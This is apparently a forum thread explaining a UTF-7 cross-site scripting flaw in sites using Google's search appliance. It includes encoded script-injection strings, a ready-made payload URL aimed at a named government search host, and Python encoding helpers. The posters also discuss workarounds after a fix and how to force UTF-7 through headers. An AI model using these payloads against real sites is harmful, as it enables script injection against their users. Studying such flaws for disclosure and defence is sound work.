So i fell asleep last night and didn't finish the encoding script as i assumed i would. But finally finished (pain in the ass to write btw)

The topic is plenty descriptive - it's an XSS in most sites that use the google search API with its generic results template. The api allows any encoding method to be used for output, and doesn't sanitize until after the page has been converted. (Google.com uses the same API but it's unaffected because it sanitizes in UTF-8 before converting to the output encoding)

Did i confuse you yet? _-_ Just add the parameter oe=UTF-7 to any site using google's search API and the query q=<script>alert("XSS")</script> converted to UTF-7 using http://maluc.sitesled.com/utf7.html .. Which translates to:

q=+ADw-script+AD4-alert(+ACI-XSS+ACI-)+ADw-/script+AD4- (with each + sent as %2B in the URL)

You can also sometimes append any parameter like apple=">[Injection] to the search string:
http://externalsearch.nist.gov/search?client=default_frontend&site=itl_antd_collection&output=xml_no_dtd&proxystylesheet=default_frontend&ie=UTF8&oe=UTF-7&as_q=asdf&apple=%2BACI-%2BAD4-%2BADw-SCRIPT%2BAD4-alert(%2BACI-XSS%2BACI-)%2BADw-/SCRIPT%2BAD4-%2BADw-x
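
To see what that URL actually carries, here's a rough Python sketch that only parses the string (nothing is requested) and decodes the apple parameter. It leans on the standard urllib.parse module and Python's built-in utf-7 codec; the variable names are mine and have nothing to do with the appliance itself.

```python
from urllib.parse import urlsplit, parse_qs

# The example URL from the post, split across lines for readability.
url = ("http://externalsearch.nist.gov/search?client=default_frontend"
       "&site=itl_antd_collection&output=xml_no_dtd"
       "&proxystylesheet=default_frontend&ie=UTF8&oe=UTF-7&as_q=asdf"
       "&apple=%2BACI-%2BAD4-%2BADw-SCRIPT%2BAD4-alert(%2BACI-XSS%2BACI-)"
       "%2BADw-/SCRIPT%2BAD4-%2BADw-x")

# parse_qs undoes the percent-encoding, so %2B comes back as a literal +.
params = parse_qs(urlsplit(url).query)
output_encoding = params["oe"][0]
raw_value = params["apple"][0]

# What a browser would see if it rendered the page as UTF-7.
decoded_value = raw_value.encode("ascii").decode("utf-7")

print(output_encoding)
print(raw_value)
print(decoded_value)
```

The raw value contains no < > or " at all, which is why a filter looking at it before the UTF-7 interpretation finds nothing to strip.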

One problem though: any site with embedded script like for(i=0;i<10;i++) gets changed to for(i=0;i<10;i ) .. which is an infinite loop. you'll have to overwrite that when exploiting..

because of how UTF-7 encoding works.. any special characters - i.e. not
a-z A-Z 0-9 or ' ( ) , - . / : ?
.. get encoded as the base64 of their UTF-16 value. The format has a start character of + and an optional end character of -, so < becomes +ADw-
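
A minimal sketch of that rule in Python, in case the online converter is down. This is not the script behind utf7.html, just my reading of the description above: every character outside the safe set becomes + followed by the unpadded base64 of its UTF-16BE bytes, then -. I'm also assuming space passes through untouched and that a literal + is written as +-. Note that Python's own "utf-7" encoder leaves characters like < and > alone (they're optional direct characters in RFC 2152), which is why the sketch rolls its own.

```python
import base64

# Characters the post lists as passing through unencoded, plus space (assumption).
DIRECT = set(
    "abcdefghijklmnopqrstuvwxyz"
    "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
    "0123456789'(),-./:? "
)


def utf7_encode(text: str) -> str:
    """Encode text one character at a time, UTF-7 style (hypothetical helper)."""
    out = []
    for ch in text:
        if ch == "+":
            out.append("+-")  # a literal plus sign is written as +-
        elif ch in DIRECT:
            out.append(ch)
        else:
            # base64 of the UTF-16BE bytes, with the = padding dropped
            b64 = base64.b64encode(ch.encode("utf-16-be")).decode("ascii")
            out.append("+" + b64.rstrip("=") + "-")
    return "".join(out)


print(utf7_encode("<"))
print(utf7_encode('">'))
```

Encoding character by character is wasteful compared to encoding whole runs, but it produces the same +ADw- / +AD4- / +ACI- pieces used in the URLs in this thread.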

So ++ gets interpreted as an invalid encoding and erased. An annoying side-effect if that infinite for() loop comes before the injection and thus can't be overwritten fast enough :/ .. luckily, most seem to be afterwards so they can be fixed during exploit
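
A quick way to convince yourself that ++ isn't valid UTF-7, using Python's built-in codec as a stand-in. Python's strict decoder raises an error where the browsers described here silently drop the sequence, so this only shows that the bytes are malformed, not what any particular browser does with them. The helper name is made up for the example.

```python
def decodes_cleanly(raw: bytes) -> bool:
    """Return True if raw is well-formed UTF-7 according to Python's decoder."""
    try:
        raw.decode("utf-7")
        return True
    except UnicodeDecodeError:
        return False


# The first + opens a base64 run, the second + is a base64 digit,
# and the ) ends the run with only 6 bits collected: not a full character.
print(decodes_cleanly(b"for(i=0;i<10;i++)"))

# Writing each literal plus as +- keeps the loop intact.
print(b"for(i=0;i<10;i+-+-)".decode("utf-7"))
```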

as i said in the first post.. google.com is not affected because they sanitize all input in UTF-8 (whereas their Search Appliance product sanitizes it in the output encoding of choice)

so if your input encoding is set to UTF-8 (or anything that's not UTF-7), and your output to UTF-7
query= +ADw- :
it sanitizes, but nothing is dangerous. then it converts the +ADw- to UTF-7, +-ADw- .. which is the correct way to encode a +

if you set the input to UTF-7 .. and output to UTF-7
query= +ADw- :
it first converts the +ADw- to UTF-8, or < .. then it sanitizes that - changing it to %3C. then it converts that back to UTF-7, +ACU-3C .. which is the correct way to encode %3C

Since google always sanitizes in UTF-8 .. there's no way around it. If there was, i never would've disclosed it >:)
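
The difference between the two orderings can be sketched like this. It's a toy model, not Google's code: html.escape stands in for whatever sanitizer is really used (the description above has it percent-encoding instead), and all three function names are hypothetical.

```python
import html


def sanitize_raw(query: str) -> str:
    """Appliance-style (as described above): filter the query without decoding it."""
    return html.escape(query)


def sanitize_after_decoding(query: str, input_encoding: str) -> str:
    """google.com-style (as described above): decode first, then filter."""
    decoded = query.encode("ascii").decode(input_encoding)
    return html.escape(decoded)


def as_browser_sees_it(body: str, charset: str) -> str:
    """Interpret the served ASCII bytes in the page's declared charset."""
    return body.encode("ascii").decode(charset)


payload = "+ADw-script+AD4-"

# Filtering the raw string finds nothing to escape; the UTF-7 page then
# turns it into a live tag.
print(as_browser_sees_it(sanitize_raw(payload), "utf-7"))

# Decoding first exposes the < and > to the filter.
print(as_browser_sees_it(sanitize_after_decoding(payload, "utf-7"), "utf-7"))
```

The point is only the order of operations: the filter has to run on the same characters the browser will end up seeing.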

I follow what you are saying, but somewhere something got changed.

When i compare the results from last week to this week using the same links i can confidently say that they have changed the parser function within the last week. This i know because i could break out of the search input field and today i can't. The problem i originally had was that i couldn't figure out the correct way to submit the search value and get it to xss.

Furthermore today's results compared against last week show that they have removed the + signs altogether from the search field which was causing the breakout (when used with utf-7).

Maluc, is there a way to circumvent this in "normal" sites? i can imagine just tampering with the header to read UTF-7 instead of UTF-8. Or is this idea too wild? i haven't completely absorbed your UTF-7 info, so any explanation is welcome.

Like: sending a form, and at the same time changing the UTF-8 > UTF-7 ?

Well each browser will have its default encoding set in its Options. So if it's not explicitly said otherwise, it uses the default. I don't think you'll find many users with UTF-7 or US-ASCII as default. And i can only think of two ways to define it explicitly in an HTML page:

the Search Appliance works because it sets the meta charset to whatever oe= in the GET. That's the main way i find it on random sites. Except more than 50% of the time, i find it as an Advanced Search feature that's there but never even used normally. So keep an eye on the View Source and GET string.

the second way that i'm not sure if it's possible.. is to use Flash to send a raw Request to the page and include the header Accept-Charset: UTF-7
it may not be as simple as that though, and may require something more like Accept-Charset: UTF-7;q=0,ISO-8859-1 or UTF-8 if that's the website's default. q=0 means that charset is not allowed. Again, i haven't tried this out yet..

the quality value (q=0) is kinda confusing to explain so i'll point ya to RFC 2616 section 14.2. And i can't really think of any other way right now. That might be because it's 9am and i haven't slept yet ^^;
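
For reading those q values, here's a small sketch of how a server might interpret an Accept-Charset header along the lines of RFC 2616 section 14.2. It's a simplified parser written for this post (no wildcard handling, no validation), and the function name is hypothetical.

```python
from typing import Dict


def parse_accept_charset(header: str) -> Dict[str, float]:
    """Map each listed charset to its quality value (1.0 when q is omitted)."""
    prefs: Dict[str, float] = {}
    for item in header.split(","):
        parts = [p.strip() for p in item.split(";")]
        name = parts[0].lower()
        if not name:
            continue
        q = 1.0
        for param in parts[1:]:
            if param.lower().startswith("q="):
                q = float(param[2:])
        prefs[name] = q
    return prefs


print(parse_accept_charset("UTF-7"))
print(parse_accept_charset("UTF-7;q=0,ISO-8859-1"))
```

Read this way, a charset with q=0 is the one being refused, so the second header marks UTF-7 as not acceptable and ISO-8859-1 as fully acceptable. Whether a given site pays any attention to the header at all is a separate question.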

lol.. well it seems like anything short of arbitrary code execution isn't enough to make it into CERT's database. And no pentesters were credited on that summary page - so i'm happy enough to see them mention it ^^

That said, i stumbled upon that announcement right after they made it.. and was the reason i stopped to test their site more thoroughly. but i promise i'm not bitter >.>

i was really hoping their search engine would be vulnerable to the same issue since it has a charset=blah .. but i came up empty when i tried it last week :/